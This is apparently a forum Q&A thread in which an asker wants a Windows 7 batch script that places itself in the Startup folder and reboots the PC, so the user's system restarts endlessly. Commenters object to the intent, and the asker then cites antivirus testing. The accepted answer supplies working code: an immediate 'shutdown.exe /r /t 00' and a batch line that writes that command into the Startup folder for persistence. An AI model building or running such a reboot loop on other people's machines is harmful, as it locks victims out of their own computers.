# Batch script to reboot a Windows 7 PC

Tags: windows-7, batch-file

I want a system restart batch script to:

1. On first execution, it should put this script in startup folder
2. It should re-start the system. So that it keeps on restarting user's system.

Can you please guide me in this? Thanks in advance

Comment: Why would anyone want to do this?

Comment: It may not be practical, but it would be a practical joke.

Comment: you want help to screw up others ??

Comment: @all sorry if it was a idiotic question, but I was writing a article on anti-virus programs and I was testing whether these type of batch files will be detected by any antivirus

Answer (score 5, accepted):

The command to restart your PC is

```
shutdown.exe /r /t 00
```

- /r is the switch for restarting
  <sub>/s stands for shutdown</sub>
  <sup>/h is for hibernating</sup>
- /t XX is the time in seconds to wait until the command is executed

Your startup folder can be accessed via an environment variable

```
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
```

Your batch file to create another batch in that folder with a specific command could look like

```
set command=shutdown.exe /r /t 00
echo %command% > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\restart.bat"
```

[Source](http://www.computerhope.com/shutdown.htm)